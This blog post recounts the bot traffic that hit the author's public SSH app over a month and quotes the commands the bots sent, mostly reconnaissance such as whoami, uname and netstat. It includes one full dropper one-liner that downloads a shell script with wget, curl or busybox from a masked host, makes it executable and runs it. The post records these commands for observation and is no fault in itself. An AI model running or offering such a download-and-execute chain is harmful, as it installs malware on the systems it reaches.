DEV Community

hiro
hiro

Posted on • Originally published at hiro.one on

Here is what happened when I exposed my SSH app

#go #ssh #tui #bubbletea

As I wrote in the previous post, now I have an SSH app that's been running for a month. The good thing is, I have lots of visitors to it. And the bad thing is - unfortunately none of them is an actual user 🥲

My SSH app is under attack.

It's no problem. The app talks in SSH protocol over the network - but it doesn't allow attackers to gain the actual shell at all. (The app is run on a distroless image container that has minimum security vulnerability exposure)

Messages I Got

So what does the attacks look like? Let me share some of the hello messages I received.

echo IoT_ACCESS_VERIFIED
Enter fullscreen mode Exit fullscreen mode

This is the message I've received the most. What does this even mean? Well, it just displays IoT_ACCESS_VERIFIED literally, only when on success. As you may realize this is probably sent by bots. And when the attempt succeeded, the bot will tell its owner it found a new target. Is this a defacto-standard echo command in the bot community? Or there might be a well-known program written for this purpose in Go.

The list has many messages that have similar purpose:

whoami
true
pwd
hostname
Enter fullscreen mode Exit fullscreen mode

Let's see what other messages look like:

uname -s -m
uname -a
Enter fullscreen mode Exit fullscreen mode

I have never used uname personally. The command is used to identify the OS and CPU architecture as well as their version. It should be used to find out vulnerable servers with obsolete OS version on the internet I guess. It's a bit scary thinking about having a website been unmaintained for years...

mount | head - 5
Enter fullscreen mode Exit fullscreen mode

This lists devices currently mounted on the server you're in. Why this command? No idea.

netstat -tulpn 2>/dev/null | grep LISTEN | head -20
Enter fullscreen mode Exit fullscreen mode

This one linear above will display the first 20 port number listening on. Cool.

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm sMLuxc.sh;wget http://<server_name>/sMLuxc.sh || curl -O http://<server_name>/sMLuxc.sh || /bin/busybox wget http://<server_name>/sMLuxc.sh; chmod 777 sMLuxc.sh;./sMLuxc.sh
Enter fullscreen mode Exit fullscreen mode

This one is the most aggressive one I have ever received. It downloads a malicious script and run it. Interesting... (I masked the IP address to the site so that no one accidentally visit the site.)

One More Thing

They come to my app all the way down from all over the world at least. So I send the following code as a welcome message back to my visitors 😊

aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kRlVsQVFaQjlOZwo=
Enter fullscreen mode Exit fullscreen mode

It should be too easy for them. But I hope they like it 😉

Top comments (0)